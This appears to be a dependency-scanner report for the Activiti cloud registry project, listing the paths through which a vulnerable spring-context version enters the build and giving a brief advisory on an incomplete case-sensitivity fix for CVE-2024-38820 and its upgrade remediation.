  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10

Overview

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to an incomplete fix for CVE-2024-38820, where it is still possible to bypass the disallowedFields checks.

Note:

This vulnerability was also fixed in commercial versions 6.0.28 and 5.3.43.

Remediation

Upgrade org.springframework:spring-context to version 6.1.20, 6.2.7 or higher.

References

Improper Handling of Case Sensitivity vulnerability report

low severity

Improper Handling of Case Sensitivity

  • Vulnerable module: org.springframework:spring-context
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.glassfish.hk2:spring-bridge@3.1.1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.boot:spring-boot-starter-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jetty-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-jetty@4.1.0-RC1 org.springframework.boot:spring-boot-web-server@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-health@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework:spring-webmvc@7.0.7 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-freemarker@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-cache@4.0.2 org.springframework:spring-context-support@7.0.3 org.springframework:spring-context@6.1.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-config@5.0.3 org.springframework.cloud:spring-cloud-config-client@5.0.3 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-actuator@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-freemarker@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.1 org.springframework.boot:spring-boot-starter-cache@4.0.2 org.springframework.boot:spring-boot-starter@4.1.0-RC1 org.springframework.boot:spring-boot-autoconfigure@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 org.springframework.boot:spring-boot-jackson@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 org.springframework.boot:spring-boot-servlet@4.1.0-RC1 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-starter@5.0.1 org.springframework.cloud:spring-cloud-context@5.0.1 org.springframework.boot:spring-boot-restclient@4.0.2 org.springframework.boot:spring-boot-http-client@4.0.2 org.springframework.boot:spring-boot@4.1.0-RC1 org.springframework:spring-context@6.1.10
